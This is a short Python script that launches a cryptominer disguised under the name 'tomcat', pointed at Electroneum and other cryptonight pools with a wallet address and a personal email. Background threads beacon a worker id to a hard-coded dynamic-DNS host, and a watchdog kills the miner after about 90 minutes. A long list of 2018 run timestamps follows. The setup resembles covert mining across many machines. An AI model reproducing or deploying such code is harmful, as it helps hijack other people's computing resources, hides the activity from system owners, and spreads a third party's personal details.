import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:08:05.574184
#2018-02-17 16:54:07.074698
#2018-02-17 18:41:06.121968
#2018-02-17 20:29:03.586455
#2018-02-17 22:16:05.218053
#2018-02-18 00:00:11.633835
#2018-02-18 01:50:06.254387
#2018-02-18 03:38:05.476145
#2018-02-18 05:24:06.381887
#2018-02-18 07:16:04.180545
#2018-02-18 09:03:01.320884
#2018-02-18 10:50:06.668781
#2018-02-18 12:38:01.752473
#2018-02-18 14:24:05.667177
#2018-02-18 16:15:01.577046
#2018-02-18 18:03:01.484452
#2018-02-18 19:49:06.596232
#2018-02-18 21:37:06.857661
#2018-02-18 23:25:05.515604
#2018-02-19 01:12:05.835648
#2018-02-19 02:57:05.086630
#2018-02-19 04:44:04.291289
#2018-02-19 06:27:06.947585
#2018-02-19 08:17:05.093366
#2018-02-19 10:06:06.823500
#2018-02-19 11:55:02.975193
#2018-02-19 13:42:01.459529
#2018-02-19 15:32:08.294878
#2018-02-19 17:20:04.560104
#2018-02-19 19:09:07.343798
#2018-02-19 20:54:06.741444
#2018-02-19 22:43:01.838161
#2018-02-20 00:26:05.788584
#2018-02-20 02:14:02.004403
#2018-02-20 04:05:04.099032
#2018-02-20 05:48:03.688552
#2018-02-20 07:34:02.011930
#2018-02-20 09:18:06.272879
#2018-02-20 11:02:07.412089
#2018-02-20 12:50:10.652031
#2018-02-20 14:35:01.520429
#2018-02-20 16:18:06.983781
#2018-02-20 18:06:07.554142
#2018-02-20 19:58:06.471996
#2018-02-20 21:45:07.398414
#2018-02-20 23:27:05.923576
#2018-02-21 01:10:07.362889
#2018-02-21 02:56:05.245210
#2018-02-21 04:43:06.059365
#2018-02-21 06:34:01.356702
#2018-02-21 08:19:02.153097
#2018-02-21 10:05:02.619377
#2018-02-21 11:52:01.349217
#2018-02-21 13:44:06.442407
#2018-02-21 15:32:06.331444
#2018-02-21 17:21:01.247658
#2018-02-21 19:09:05.946541
#2018-02-21 20:57:01.428450
#2018-02-21 22:45:09.062079
#2018-02-22 00:36:01.349000
#2018-02-22 02:23:03.988896
#2018-02-22 04:09:05.602218
#2018-02-22 05:54:06.271522
#2018-02-22 07:40:03.836833
#2018-02-22 09:28:04.870881
#2018-02-22 11:14:06.471847
#2018-02-22 13:00:09.062616
#2018-02-22 14:47:02.163937
#2018-02-22 16:34:01.421037
#2018-02-22 18:20:10.648052
#2018-02-22 20:13:05.425279
#2018-02-22 21:59:01.515173
#2018-02-22 23:46:05.910608
#2018-02-23 01:36:01.800692
#2018-02-23 03:22:07.438658
#2018-02-23 05:10:01.641488
#2018-02-23 06:55:06.773739
#2018-02-23 08:44:07.946380
#2018-02-23 11:02:01.337766
#2018-02-23 12:57:04.234136
#2018-02-23 14:44:03.586650
#2018-02-23 16:32:07.205025
#2018-02-23 18:18:08.621367
#2018-02-23 20:02:08.065247
#2018-02-23 21:46:01.403111
#2018-02-23 23:38:06.079049
#2018-02-24 01:28:08.134598
#2018-02-24 03:20:07.396901
#2018-02-24 05:06:04.078066
#2018-02-24 06:53:07.370364
#2018-02-24 08:43:03.552088
#2018-02-24 10:27:05.066304
#2018-02-24 12:22:05.211169
#2018-02-24 14:16:06.681974
#2018-02-24 16:02:06.491120
#2018-02-24 17:54:06.118732
#2018-02-24 19:41:07.849350
#2018-02-24 22:54:06.198034
#2018-02-25 03:04:08.048759
#2018-02-25 07:04:03.627191